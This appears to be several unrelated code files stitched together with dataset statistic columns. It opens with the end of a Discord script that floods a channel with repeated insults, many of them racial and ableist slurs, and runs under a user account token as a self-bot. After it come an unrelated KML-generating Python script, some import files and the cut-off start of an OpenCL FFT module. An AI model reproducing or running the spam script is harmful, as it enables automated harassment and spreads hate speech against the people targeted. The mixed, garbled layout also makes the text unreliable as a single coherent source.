await message.channel.send ('WHY YOU SLOWING DOWN KEEP IT GOING')
await message.channel.send ('WEAK FUCKING BITCH')
await message.channel.send ('FUCKING RETARD DOESNT KNOW WHAT TO SAY')
await message.channel.send ('YOU SUCK PUSSY')
await message.channel.send ('LMFAOOO SHOULD I GIVE MY SON A CHANCE')
await message.channel.send ('WEAK ASS BITCH FOCUS UP SON')
await message.channel.send ('PRAY YOU WONT FOLD TONIGHT')
await message.channel.send ('LMFAOAOAOAO')
await message.channel.send ('WEAK ASS FUCKING TROLL CANT PRESS ME')
await message.channel.send ('FOCUS LOLL UR ASS')
await message.channel.send ('DUMBASS WEAK TROLL')
await message.channel.send ('LOL FUCKING RETARDED BITCH')
await message.channel.send ('DUMB BITCH YOU FEAR ME')
await message.channel.send ('FUCKING TROLL')
await message.channel.send ('U CANT PRESSURE ME')
await message.channel.send ('1')
await message.channel.send ('UR A SKID LOOLOOLOL')
await message.channel.send ('DONT GET TIRED')
await message.channel.send ('LOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOL')
await message.channel.send ('LLOLOLOLOLOLOLLLOO')
await message.channel.send ('LOOLLOLOLO')
await message.channel.send ('LOLL')
await message.channel.send ('YOU FUCKING SUCK LAME ASS NIGGA')
await message.channel.send ('YOUR SO BAD LOOOOL')
await message.channel.send ('LAME ASS NIGGA U CANT KEEP UP WITH ME')
await message.channel.send ('YOUR SO BAD LOOOOL')
await message.channel.send ('LAME ASS NIGGA U CANT KEEP UP WITH ME')
await message.channel.send ('ASS')
await message.channel.send ('LOOLLOLOLO')
await message.channel.send ('LOLL')
await message.channel.send ('YOU FUCKING SUCK LAME ASS NIGGA')
await message.channel.send ('YOUR SO BAD LOOOOL')
await message.channel.send ('LAME ASS NIGGA U CANT KEEP UP WITH ME')
await message.channel.send ('ASS')
await message.channel.send ('BITCH')
await message.channel.send ('LOO')
await message.channel.send ('LLOL')
await message.channel.send ('LO')
await message.channel.send ('COME')
await message.channel.send ('LETS')
await message.channel.send ('SKID RETARDED ASS NIGGA UR SO SHIT')
await message.channel.send ('LOOOOOOOOOOOOOOOOOLLLLLLLLLOOOOOOOOOL')
await message.channel.send ('LOOOOOOOOOOOOOOL')
await message.channel.send ('OOOOOOOOOLOLO')
await message.channel.send ('OLOLOLOLOLOL')
await message.channel.send ('FOLOLLOLOLOLO')
await message.channel.send ('ASS')
await message.channel.send ('YOU WEAK BITCH KEEP UP WITH ME')
await message.channel.send ('KEEP CHAT MOVING SON')
await message.channel.send ('BITCH')
await message.channel.send ('LOO')
await message.channel.send ('LLOL')
await message.channel.send ('LO')
await message.channel.send ('COME')
await message.channel.send ('LETS')
await message.channel.send ('SKID RETARDED ASS NIGGA UR SO SHIT')
await message.channel.send ('LOOOOOOOOOOOOOOOOOLLLLLLLLLOOOOOOOOOL')
await message.channel.send ('LOOOOOOOOOOOOOOL')
await message.channel.send ('OOOOOOOOOLOLO')
await message.channel.send ('OLOLOLOLOLOL')
await message.channel.send ('FOLOLLOLOLOLO')
await message.channel.send ('ASS')
await message.channel.send ('YOU WEAK BITCH KEEP UP WITH ME')
await message.channel.send ('KEEP CHAT MOVING SON')
await message.channel.send ('NO BREAKS FOR YOU KEEP ON GOING SON')
await message.channel.send ('WHY YOU SLOWING DOWN KEEP IT GOING')
await message.channel.send ('WEAK FUCKING BITCH')
await message.channel.send ('FUCKING RETARD DOESNT KNOW WHAT TO SAY')
await message.channel.send ('YOU SUCK PUSSY')
await message.channel.send ('LMFAOOO SHOULD I GIVE MY SON A CHANCE')
await message.channel.send ('WEAK ASS BITCH FOCUS UP SON')
await message.channel.send ('PRAY YOU WONT FOLD TONIGHT')
await message.channel.send ('LMFAOAOAOAO')
await message.channel.send ('WEAK ASS FUCKING TROLL CANT PRESS ME')
await message.channel.send ('FOCUS LOLL UR ASS')
await message.channel.send ('DUMBASS WEAK TROLL')
await message.channel.send ('LOL FUCKING RETARDED BITCH')
await message.channel.send ('DUMB BITCH YOU FEAR ME')
await message.channel.send ('FUCKING TROLL')
await message.channel.send ('BITCH')
await message.channel.send ('LOLO')
await message.channel.send ('LOOL')
await message.channel.send ('OLOL')
await message.channel.send ('LOLO')
await message.channel.send ('DONT STOP')
await message.channel.send ('SPAMMING')
await message.channel.send ('LAME ASS NIGGA UR SO ASS LOOOOOL')
await message.channel.send ('WEAK ASS BITCH UR SO SHIT')
await message.channel.send ('WEAK ASS NIGGA')
await message.channel.send ('UR SO SHIT LOOOOOLL')
await message.channel.send ('KEEP PACKING SON DONT STOP')
await message.channel.send ('FOCUS SON DONT FOLD LOOOOL UR ASS')
await message.channel.send ('WEAK ASS BITCH YOU CANT LAST WITH ME')
await message.channel.send ('WHY DO YOU FEAR ME SO MUCH SON?')
await message.channel.send ('HE CANT KEEP UP WITH ME')
await message.channel.send ('HES MY JR LMFAOAOAOA')
await message.channel.send ('FREAK DOESNT KNOW WHAT HE GOT HIMSELF INTO')
await message.channel.send ('MY SON IS CRYING RN HE SLOWING DOWN')
await message.channel.send ('HES GETTING HAND CRAMPS')
await message.channel.send ('FOCUS UP SON FUCKING WEAK TROLL')
await message.channel.send ('WEAK BITCH STOP DUCKING ME SON U CANT PRESS ME U SUCK')
await message.channel.send ('LOOOL')
await message.channel.send ('OL')
await message.channel.send ('YOU WEAK BITCH KEEP UP WITH ME')
await message.channel.send ('KEEP CHAT MOVING SON')
await message.channel.send ('NO BREAKS FOR YOU KEEP ON GOING SON')
await message.channel.send ('WHY YOU SLOWING DOWN KEEP IT GOING')
await message.channel.send ('WEAK FUCKING BITCH')
await message.channel.send ('FUCKING RETARD DOESNT KNOW WHAT TO SAY')
await message.channel.send ('YOU SUCK PUSSY')
await message.channel.send ('LMFAOOO SHOULD I GIVE MY SON A CHANCE')
await message.channel.send ('WEAK ASS BITCH FOCUS UP SON')
await message.channel.send ('PRAY YOU WONT FOLD TONIGHT')
await message.channel.send ('LMFAOAOAOAO')
await message.channel.send ('WEAK ASS FUCKING TROLL CANT PRESS ME')
await message.channel.send ('FOCUS LOLL UR ASS')
await message.channel.send ('DUMBASS WEAK TROLL')
await message.channel.send ('LOL FUCKING RETARDED BITCH')
await message.channel.send ('DUMB BITCH YOU FEAR ME')
await message.channel.send ('FUCKING TROLL')
await message.channel.send ('U CANT PRESSURE ME')
await message.channel.send ('1')
await message.channel.send ('UR A SKID LOOLOOLOL')
await message.channel.send ('DONT GET TIRED')
await message.channel.send ('LOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOL')
await message.channel.send ('LLOLOLOLOLOLOLLLOO')
await message.channel.send ('LOOLLOLOLO')
await message.channel.send ('YOU WEAK BITCH KEEP UP WITH ME')
await message.channel.send ('KEEP CHAT MOVING SON')
await message.channel.send ('NO BREAKS FOR YOU KEEP ON GOING SON')
await message.channel.send ('WHY YOU SLOWING DOWN KEEP IT GOING')
await message.channel.send ('WEAK FUCKING BITCH')
await message.channel.send ('FUCKING RETARD DOESNT KNOW WHAT TO SAY')
await message.channel.send ('YOU SUCK PUSSY')
await message.channel.send ('LMFAOOO SHOULD I GIVE MY SON A CHANCE')
await message.channel.send ('WEAK ASS BITCH FOCUS UP SON')
await message.channel.send ('PRAY YOU WONT FOLD TONIGHT')
await message.channel.send ('LMFAOAOAOAO')
await message.channel.send ('WEAK ASS FUCKING TROLL CANT PRESS ME')
await message.channel.send ('FOCUS LOLL UR ASS')
await message.channel.send ('DUMBASS WEAK TROLL')
await message.channel.send ('LOL FUCKING RETARDED BITCH')
await message.channel.send ('DUMB BITCH YOU FEAR ME')
await message.channel.send ('FUCKING TROLL')
await message.channel.send ('U CANT PRESSURE ME')
await message.channel.send ('1')
await message.channel.send ('UR A SKID LOOLOOLOL')
await message.channel.send ('DONT GET TIRED')
await message.channel.send ('LOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOL')
await message.channel.send ('LLOLOLOLOLOLOLLLOO')
await message.channel.send ('LOOLLOLOLO')
await message.channel.send ('L')
await message.channel.send ('OLO')
await message.channel.send ('LO')
await message.channel.send ('O')
await message.channel.send ('LOLOLO')
await message.channel.send ('L')
await message.channel.send ('YOU WEAK BITCH KEEP UP WITH ME')
await message.channel.send ('KEEP CHAT MOVING SON')
await message.channel.send ('NO BREAKS FOR YOU KEEP ON GOING SON')
await message.channel.send ('WHY YOU SLOWING DOWN KEEP IT GOING')
await message.channel.send ('WEAK FUCKING BITCH')
await message.channel.send ('FUCKING RETARD DOESNT KNOW WHAT TO SAY')
await message.channel.send ('YOU SUCK PUSSY')
await message.channel.send ('LMFAOOO SHOULD I GIVE MY SON A CHANCE')
await message.channel.send ('WEAK ASS BITCH FOCUS UP SON')
await message.channel.send ('PRAY YOU WONT FOLD TONIGHT')
await message.channel.send ('LMFAOAOAOAO')
await message.channel.send ('WEAK ASS FUCKING TROLL CANT PRESS ME')
await message.channel.send ('FOCUS LOLL UR ASS')
await message.channel.send ('DUMBASS WEAK TROLL')
await message.channel.send ('LOL FUCKING RETARDED BITCH')
await message.channel.send ('DUMB BITCH YOU FEAR ME')
await message.channel.send ('FUCKING TROLL')
await message.channel.send ('SHUT')
await message.channel.send ('THE')
await message.channel.send ('FUCK')
await message.channel.send ('UP')
await message.channel.send ('AND')
await message.channel.send ('COME')
await message.channel.send ('MAKE A PRINT YOU SKIDDDDDDDDDD LOLLLLLLLLLLLLLLLL')
await message.channel.send ('FUCKING')
await message.channel.send ('PUSSY')
await message.channel.send ('YOU')
await message.channel.send ('SUCK')
await message.channel.send ('FREAK DOESNT KNOW WHAT HE GOT HIMSELF INTO')
await message.channel.send ('MY SON IS CRYING RN HE SLOWING DOWN')
await message.channel.send ('HES GETTING HAND CRAMPS')
await message.channel.send ('FOCUS UP SON FUCKING WEAK TROLL')
await message.channel.send ('WEAK BITCH STOP DUCKING ME SON U CANT PRESS ME U SUCK')
await message.channel.send ('LOOOL')
await message.channel.send ('OL')
await message.channel.send ('L')
await message.channel.send ('OLO')
await message.channel.send ('LO')
await message.channel.send ('O')
await message.channel.send ('LOLOLO')
await message.channel.send ('L')
await message.channel.send ('YOU WEAK BITCH KEEP UP WITH ME')
await message.channel.send ('KEEP CHAT MOVING SON')
await message.channel.send ('NO BREAKS FOR YOU KEEP ON GOING SON')
await message.channel.send ('WHY YOU SLOWING DOWN KEEP IT GOING')
await message.channel.send ('WEAK FUCKING BITCH')
await message.channel.send ('FUCKING RETARD DOESNT KNOW WHAT TO SAY')
await message.channel.send ('YOU SUCK PUSSY')
await message.channel.send ('LMFAOOO SHOULD I GIVE MY SON A CHANCE')
await message.channel.send ('WEAK ASS BITCH FOCUS UP SON')
await message.channel.send ('PRAY YOU WONT FOLD TONIGHT')
await message.channel.send ('LMFAOAOAOAO')
await message.channel.send ('WEAK ASS FUCKING TROLL CANT PRESS ME')
await message.channel.send ('FOCUS LOLL UR ASS')
await message.channel.send ('DUMBASS WEAK TROLL')
await message.channel.send ('LOL FUCKING RETARDED BITCH')
await message.channel.send ('DUMB BITCH YOU FEAR ME')
await message.channel.send ('FUCKING TROLL')
await message.channel.send ('SHUT')
await message.channel.send ('THE')
await message.channel.send ('FUCK')
await message.channel.send ('UP')
await message.channel.send ('AND')
await message.channel.send ('COME')
await message.channel.send ('MAKE A PRINT YOU SKIDDDDDDDDDD LOLLLLLLLLLLLLLLLL')
await message.channel.send ('FUCKING')
await message.channel.send ('PUSSY')
await message.channel.send ('YOU')
await message.channel.send ('SUCK')
await message.channel.send ('FREAK DOESNT KNOW WHAT HE GOT HIMSELF INTO')
await message.channel.send ('MY SON IS CRYING RN HE SLOWING DOWN')
await message.channel.send ('HES GETTING HAND CRAMPS')
await message.channel.send ('FOCUS UP SON FUCKING WEAK TROLL')
await message.channel.send ('WEAK BITCH STOP DUCKING ME SON U CANT PRESS ME U SUCK')
await message.channel.send ('LOOOL')
await message.channel.send ('OL')
await message.channel.send ('L')
await message.channel.send ('OLO')
await message.channel.send ('LO')
await message.channel.send ('O')
await message.channel.send ('LOLOLO')
await message.channel.send ('L')
await message.channel.send ('YOU WEAK BITCH KEEP UP WITH ME')
await message.channel.send ('KEEP CHAT MOVING SON')
await message.channel.send ('NO BREAKS FOR YOU KEEP ON GOING SON')
await message.channel.send ('WHY YOU SLOWING DOWN KEEP IT GOING')
await message.channel.send ('WEAK FUCKING BITCH')
await message.channel.send ('FUCKING RETARD DOESNT KNOW WHAT TO SAY')
await message.channel.send ('YOU SUCK PUSSY')
await message.channel.send ('LMFAOOO SHOULD I GIVE MY SON A CHANCE')
await message.channel.send ('WEAK ASS BITCH FOCUS UP SON')
await message.channel.send ('PRAY YOU WONT FOLD TONIGHT')
await message.channel.send ('LMFAOAOAOAO')
await message.channel.send ('WEAK ASS FUCKING TROLL CANT PRESS ME')
await message.channel.send ('FOCUS LOLL UR ASS')
await message.channel.send ('DUMBASS WEAK TROLL')
await message.channel.send ('LOL FUCKING RETARDED BITCH')
await message.channel.send ('DUMB BITCH YOU FEAR ME')
await message.channel.send ('FUCKING TROLL')
await message.channel.send ('SHUT')
await message.channel.send ('THE')
await message.channel.send ('FUCK')
await message.channel.send ('UP')
await message.channel.send ('AND')
await message.channel.send ('COME')
await message.channel.send ('MAKE A PRINT YOU SKIDDDDDDDDDD LOLLLLLLLLLLLLLLLL')
await message.channel.send ('FUCKING')
await message.channel.send ('PUSSY')
await message.channel.send ('YOU')
await message.channel.send ('SUCK')
await message.channel.send ('FREAK DOESNT KNOW WHAT HE GOT HIMSELF INTO')
await message.channel.send ('MY SON IS CRYING RN HE SLOWING DOWN')
await message.channel.send ('HES GETTING HAND CRAMPS')
await message.channel.send ('FOCUS UP SON FUCKING WEAK TROLL')
await message.channel.send ('WEAK BITCH STOP DUCKING ME SON U CANT PRESS ME U SUCK')
await message.channel.send ('LOOOL')
await message.channel.send ('OL')
await message.channel.send ('L')
await message.channel.send ('OLO')
await message.channel.send ('LO')
await message.channel.send ('O')
await message.channel.send ('LOLOLO')
await message.channel.send ('L')
await message.channel.send ('YOU WEAK BITCH KEEP UP WITH ME')
await message.channel.send ('KEEP CHAT MOVING SON')
await message.channel.send ('NO BREAKS FOR YOU KEEP ON GOING SON')
await message.channel.send ('WHY YOU SLOWING DOWN KEEP IT GOING')
await message.channel.send ('WEAK FUCKING BITCH')
await message.channel.send ('FUCKING RETARD DOESNT KNOW WHAT TO SAY')
await message.channel.send ('YOU SUCK PUSSY')
await message.channel.send ('LMFAOOO SHOULD I GIVE MY SON A CHANCE')
await message.channel.send ('WEAK ASS BITCH FOCUS UP SON')
await message.channel.send ('PRAY YOU WONT FOLD TONIGHT')
await message.channel.send ('LMFAOAOAOAO')
await message.channel.send ('WEAK ASS FUCKING TROLL CANT PRESS ME')
await message.channel.send ('FOCUS LOLL UR ASS')
await message.channel.send ('DUMBASS WEAK TROLL')
await message.channel.send ('LOL FUCKING RETARDED BITCH')
await message.channel.send ('DUMB BITCH YOU FEAR ME')
await message.channel.send ('FUCKING TROLL')
await message.channel.send ('SHUT')
await message.channel.send ('THE')
await message.channel.send ('FUCK')
await message.channel.send ('UP')
await message.channel.send ('AND')
await message.channel.send ('COME')
await message.channel.send ('MAKE A PRINT YOU SKIDDDDDDDDDD LOLLLLLLLLLLLLLLLL')
await message.channel.send ('FUCKING')
await message.channel.send ('PUSSY')
await message.channel.send ('YOU')
await message.channel.send ('SUCK')
await message.channel.send ('YOU WEAK BITCH KEEP UP WITH ME')
await message.channel.send ('KEEP CHAT MOVING SON')
await message.channel.send ('NO BREAKS FOR YOU KEEP ON GOING SON')
await message.channel.send ('WHY YOU SLOWING DOWN KEEP IT GOING')
await message.channel.send ('WEAK FUCKING BITCH')
await message.channel.send ('FUCKING RETARD DOESNT KNOW WHAT TO SAY')
await message.channel.send ('YOU SUCK PUSSY')
await message.channel.send ('LMFAOOO SHOULD I GIVE MY SON A CHANCE')
await message.channel.send ('WEAK ASS BITCH FOCUS UP SON')
await message.channel.send ('PRAY YOU WONT FOLD TONIGHT')
await message.channel.send ('LMFAOAOAOAO')
await message.channel.send ('WEAK ASS FUCKING TROLL CANT PRESS ME')
await message.channel.send ('FOCUS LOLL UR ASS')
await message.channel.send ('DUMBASS WEAK TROLL')
await message.channel.send ('LOL FUCKING RETARDED BITCH')
await message.channel.send ('DUMB BITCH YOU FEAR ME')
await message.channel.send ('FUCKING TROLL')
await message.channel.send ('U CANT PRESSURE ME')
await message.channel.send ('1')
await message.channel.send ('UR A SKID LOOLOOLOL')
await message.channel.send ('DONT GET TIRED')
await message.channel.send ('LOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOL')
await message.channel.send ('LLOLOLOLOLOLOLLLOO')
await message.channel.send ('LOOLLOLOLO')
vanis.run(token, bot=False)
| 56.301266
| 92
| 0.661361
| 2,889
| 22,239
| 5.154033
| 0.062305
| 0.341303
| 0.460645
| 0.557623
| 0.953593
| 0.946474
| 0.937676
| 0.928543
| 0.928543
| 0.918872
| 0
| 0.000583
| 0.229237
| 22,239
| 395
| 93
| 56.301266
| 0.857126
| 0
| 0
| 0.906494
| 0
| 0
| 0.329631
| 0.019649
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.005195
| 0
| 0.005195
| 0.002597
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
e15738d640f8c06baf57cdc5b0aee171a80306ea
| 10,206
|
py
|
Python
|
test/shapefiles/gen_multi_geometries.py
|
roelderickx/ogr2pbf
|
7ac99488d8daa9452e2a41e40bf2554dc720166d
|
[
"MIT"
] | null | null | null |
test/shapefiles/gen_multi_geometries.py
|
roelderickx/ogr2pbf
|
7ac99488d8daa9452e2a41e40bf2554dc720166d
|
[
"MIT"
] | null | null | null |
test/shapefiles/gen_multi_geometries.py
|
roelderickx/ogr2pbf
|
7ac99488d8daa9452e2a41e40bf2554dc720166d
|
[
"MIT"
] | null | null | null |
"""Generate KML test fixtures containing multi-geometries.

Writes two files:
- ``multi_geometries.kml``: one multipoint, one multilinestring and one
  multipolygon (two polygons, the second with an inner ring).
- ``multi_geometries_duplicate.kml``: the same document with the whole
  geometry set appended a second time, to exercise duplicate handling.
"""
from simplekml import Kml, Color

# Coordinate data shared by both the original and the duplicated geometry
# sets; every entry is a (longitude, latitude) pair.
POINT_COORDS = [(-23.0967,33.4843), (-23.1061,33.4821), (-23.0975,33.4817)]

LINESTRING_COORDS = [
    [(-23.1393528,33.4886545),(-23.1372929,33.4908736),(-23.1354046,33.4923052),(-23.1326580,33.4933073),(-23.1289673,33.4938799),(-23.1253624,33.4945957),(-23.1232166,33.4956693),(-23.1216717,33.4970293),(-23.1198692,33.4986755),(-23.1191826,33.5002501)],
    [(-23.1383228,33.4876524),(-23.1366062,33.4888693),(-23.1350613,33.4897998),(-23.1324005,33.4913030),(-23.1293964,33.4920904),(-23.1259632,33.4924483),(-23.1233883,33.4932357),(-23.1211567,33.4943809),(-23.1192684,33.4950967),(-23.1157494,33.4956693),(-23.1130886,33.4952399),(-23.1100845,33.4943809),(-23.1072521,33.4945241),(-23.1044197,33.4956693),(-23.1022739,33.4966714),(-23.1011581,33.4981029),(-23.0999565,33.4993912)],
    [(-23.1362629,33.4940946),(-23.1372070,33.4928778),(-23.1397820,33.4918041),(-23.1425285,33.4906588),(-23.1438160,33.4887977),(-23.1434727,33.4865070),(-23.1419277,33.4847890),(-23.1367779,33.4840731),(-23.1336021,33.4856480),(-23.1317139,33.4877240),(-23.1293106,33.4897283),(-23.1266499,33.4902293),(-23.1219292,33.4916609),(-23.1195259,33.4907304),(-23.1154060,33.4896567),(-23.1114578,33.4907304),(-23.1070805,33.4923052),(-23.1033897,33.4936652),(-23.0994415,33.4965998),(-23.0986691,33.4986039),(-23.0986691,33.5011805),(-23.1011581,33.5029698)],
]

POLYGON1_OUTER = [(-23.0895710,33.4706855),(-23.0868244,33.4729050),(-23.0818462,33.4744085),(-23.0760098,33.4738357),(-23.0727482,33.4737641),(-23.0702591,33.4745517),(-23.0689716,33.4755540),(-23.0683708,33.4769142),(-23.0689716,33.4778449),(-23.0709457,33.4772722),(-23.0737782,33.4761267),(-23.0778122,33.4772006),(-23.0790138,33.4786324),(-23.0786705,33.4804938),(-23.0774689,33.4819255),(-23.0756664,33.4823551),(-23.0742931,33.4837868),(-23.0740356,33.4856480),(-23.0724049,33.4870797),(-23.0697441,33.4884398),(-23.0687141,33.4880103),(-23.0688000,33.4871513),(-23.0714607,33.4854333),(-23.0706882,33.4832857),(-23.0691433,33.4851469),(-23.0657101,33.4849322),(-23.0639076,33.4828562),(-23.0632210,33.4807085),(-23.0631351,33.4784892),(-23.0640793,33.4761983),(-23.0651093,33.4744085),(-23.0671692,33.4720458),(-23.0712032,33.4707571),(-23.0739498,33.4701843),(-23.0764389,33.4683228),(-23.0767822,33.4663180),(-23.0761814,33.4645995),(-23.0739498,33.4629526),(-23.0709457,33.4612341),(-23.0704308,33.4593008),(-23.0710316,33.4572958),(-23.0728340,33.4566513),(-23.0755806,33.4560068),(-23.0778122,33.4557920),(-23.0811596,33.4557920),(-23.0843353,33.4557920),(-23.0881119,33.4538585),(-23.0901718,33.4522831),(-23.0922318,33.4504211),(-23.0954933,33.4503495),(-23.0985832,33.4521398),(-23.1007290,33.4550043),(-23.1036472,33.4558636),(-23.1075096,33.4570810),(-23.1108570,33.4576538),(-23.1130028,33.4590144),(-23.1141186,33.4615922),(-23.1143761,33.4643131),(-23.1085396,33.4653871),(-23.1037331,33.4678216),(-23.1018448,33.4711151),(-23.1021881,33.4731198),(-23.1040764,33.4762699),(-23.1037545,33.4773975),(-23.1026173,33.4777196),(-23.1014800,33.4775765),(-23.1007719,33.4771111),(-23.0985403,33.4760014),(-23.0971670,33.4756614),(-23.0961800,33.4753392),(-23.0914593,33.4720458),(-23.0895710,33.4706855)]

POLYGON2_OUTER = [(-23.1465626,33.4720458),(-23.1454468,33.4739073),(-23.1457901,33.4752676),(-23.1480217,33.4779881),(-23.1473351,33.4812096),(-23.1423569,33.4823551),(-23.1374645,33.4820687),(-23.1346321,33.4826414),(-23.1316280,33.4851469),(-23.1281948,33.4873660),(-23.1245041,33.4866502),(-23.1205559,33.4845742),(-23.1206417,33.4812812),(-23.1218433,33.4776301),(-23.1249332,33.4771290),(-23.1258774,33.4756972),(-23.1254482,33.4739073),(-23.1239033,33.4731198),(-23.1209850,33.4714015),(-23.1181526,33.4716163),(-23.1160069,33.4726902),(-23.1136036,33.4758403),(-23.1112862,33.4777017),(-23.1087971,33.4777733),(-23.1060505,33.4766995),(-23.1045914,33.4750528),(-23.1034756,33.4726186),(-23.1031322,33.4710435),(-23.1037331,33.4693967),(-23.1070805,33.4675352),(-23.1100845,33.4663896),(-23.1137753,33.4657451),(-23.1207275,33.4653871),(-23.1247616,33.4640983),(-23.1266499,33.4624514),(-23.1287098,33.4604465),(-23.1337738,33.4598020),(-23.1372070,33.4599452),(-23.1396961,33.4611625),(-23.1433868,33.4640983),(-23.1451893,33.4664612),(-23.1485367,33.4683228),(-23.1465626,33.4720458)]

POLYGON2_INNER = [(-23.1359196,33.4741937),(-23.1382370,33.4729050),(-23.1374645,33.4711151),(-23.1354904,33.4698263),(-23.1334305,33.4704707),(-23.1333447,33.4723322),(-23.1342888,33.4739789),(-23.1359196,33.4741937)]


def add_geometry_set(kml):
    """Append one full geometry set (multipoint, multilinestring and
    multipolygon with outer/inner rings) to *kml*.

    Called twice so the second output file contains every geometry in
    duplicate, matching the original script's behavior.
    """
    multipoint = kml.newmultigeometry(name="TestMultiPoint")
    for coord in POINT_COORDS:
        multipoint.newpoint(coords=[coord])
    multilinestring = kml.newmultigeometry(name="TestMultiLinestring")
    for line in LINESTRING_COORDS:
        multilinestring.newlinestring(coords=line)
    multipolygon = kml.newmultigeometry(name="TestMultiPolygon")
    polygon1 = multipolygon.newpolygon(name="TestPolygonOnlyOuter")
    polygon1.outerboundaryis = POLYGON1_OUTER
    polygon2 = multipolygon.newpolygon(name="TestPolygonWithInner")
    polygon2.outerboundaryis = POLYGON2_OUTER
    polygon2.innerboundaryis = POLYGON2_INNER


kml = Kml(open=1)
# generate geometries
add_geometry_set(kml)
kml.save("multi_geometries.kml")
# generate duplicate geometries: the same set is appended to the SAME
# document, so the second file holds both copies.
add_geometry_set(kml)
kml.save("multi_geometries_duplicate.kml")
| 204.12
| 1,831
| 0.733784
| 1,527
| 10,206
| 4.902423
| 0.229862
| 0.012824
| 0.018434
| 0.009618
| 0.882447
| 0.882447
| 0.861608
| 0.861608
| 0.861608
| 0.861608
| 0
| 0.620673
| 0.009406
| 10,206
| 49
| 1,832
| 208.285714
| 0.119782
| 0.007153
| 0
| 0
| 1
| 0
| 0.022519
| 0.002963
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.03125
| 0
| 0.03125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
e15892cbc362e9baa7c2de7664b8a7f2a77201e0
| 133
|
py
|
Python
|
api/views/__init__.py
|
leupibr/undeep
|
66c8689c438872d4ea38b95e985023f246a99ea0
|
[
"MIT"
] | 1
|
2020-06-04T13:21:32.000Z
|
2020-06-04T13:21:32.000Z
|
api/views/__init__.py
|
leupibr/undeep
|
66c8689c438872d4ea38b95e985023f246a99ea0
|
[
"MIT"
] | 18
|
2020-06-04T17:28:08.000Z
|
2022-02-27T06:00:53.000Z
|
api/views/__init__.py
|
leupibr/undeep
|
66c8689c438872d4ea38b95e985023f246a99ea0
|
[
"MIT"
] | 2
|
2020-06-04T13:19:55.000Z
|
2020-09-01T13:38:48.000Z
|
import api.views.categories
import api.views.documents
import api.views.management
import api.views.statistics
import api.views.auth
| 22.166667
| 27
| 0.849624
| 20
| 133
| 5.65
| 0.4
| 0.39823
| 0.619469
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075188
| 133
| 5
| 28
| 26.6
| 0.918699
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e17da5b00fddafce6eed9530eb160de671e5cb87
| 58
|
py
|
Python
|
addons/crnd_web_diagram_plus/models/__init__.py
|
marionumza/vocal_v12
|
480990e919c9410903e06e7813ee92800bd6a569
|
[
"Unlicense"
] | null | null | null |
addons/crnd_web_diagram_plus/models/__init__.py
|
marionumza/vocal_v12
|
480990e919c9410903e06e7813ee92800bd6a569
|
[
"Unlicense"
] | null | null | null |
addons/crnd_web_diagram_plus/models/__init__.py
|
marionumza/vocal_v12
|
480990e919c9410903e06e7813ee92800bd6a569
|
[
"Unlicense"
] | 1
|
2021-05-05T07:59:08.000Z
|
2021-05-05T07:59:08.000Z
|
from . import ir_ui_view
from . import ir_act_window_view
| 19.333333
| 32
| 0.827586
| 11
| 58
| 3.909091
| 0.636364
| 0.465116
| 0.55814
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.137931
| 58
| 2
| 33
| 29
| 0.86
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e194b51b3dd136d1af4a890bc741b28aa8bf2b94
| 49,799
|
py
|
Python
|
pyqmri/transforms.py
|
philippgualdi/PyQMRI
|
5de3a7da5feb2d01b746acd47d1dba91a8a1417e
|
[
"Apache-2.0"
] | 18
|
2019-08-09T18:42:33.000Z
|
2022-03-22T07:56:48.000Z
|
pyqmri/transforms.py
|
philippgualdi/PyQMRI
|
5de3a7da5feb2d01b746acd47d1dba91a8a1417e
|
[
"Apache-2.0"
] | 4
|
2020-10-05T15:56:58.000Z
|
2021-08-19T11:51:54.000Z
|
pyqmri/transforms.py
|
philippgualdi/PyQMRI
|
5de3a7da5feb2d01b746acd47d1dba91a8a1417e
|
[
"Apache-2.0"
] | 5
|
2020-04-21T17:28:58.000Z
|
2020-12-05T21:44:50.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Module holding the classes for different FFT operators."""
import numpy as np
import pyopencl as cl
import pyopencl.array as clarray
from gpyfft.fft import FFT
from pkg_resources import resource_filename
from pyqmri._helper_fun._calckbkernel import calckbkernel
from pyqmri._helper_fun import CLProgram as Program
class PyOpenCLnuFFT():
    """Base class for FFT calculation.

    This class serves as the base class for all FFT objects used in
    the various optimization algorithms. It provides a factory method
    to generate a FFT object based on the input.

    Parameters
    ----------
    ctx : PyOpenCL.Context
